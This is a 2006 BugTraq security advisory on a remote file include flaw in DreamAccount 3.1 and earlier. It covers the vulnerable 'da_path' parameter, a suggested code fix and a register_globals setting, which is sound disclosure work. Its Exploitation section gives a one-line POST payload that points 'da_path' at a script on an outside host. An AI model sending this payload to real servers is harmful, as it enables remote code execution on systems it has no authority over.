BugTraq
[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability Jun 05 2006 09:23AM
admin majorsecurity de
[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

------------------------------------------------------------------------
-

Software: DreamAccount

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamcost.com

Risc: High

Credits:

----------------------------

Discovered by: David 'Aesthetico' Vieira-Kurz

http://www.majorsecurity.de

Original Advisory:

----------------------------

http://www.majorsecurity.de/advisory/major_rls8.txt

Affected Products:

----------------------------

DreamAccount 3.1 and prior

Description:

----------------------------

DreamAccount is a membership and subscription software application that is both simple to use and install,

while remaining affordable enough for even the smallest startup.

Requirements:

----------------------------

register_globals = On

Vulnerability:

----------------------------

Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not

properly verified, before it is used to include files.

This can be exploited to execute arbitrary code by including files from external resources.

Solution:

----------------------------

I think you can fix this bug by replacing the following vulnerable code in the

"auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this

problem.

Vulnerable one: "require($da_path . "setup.php");"

MajorSecurity fix: "require("setup.php");"

Set "register_globals" to "Off".

Exploitation:

----------------------------

Post data:

da_path=http://www.yourspace.com/yourscript.php?

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus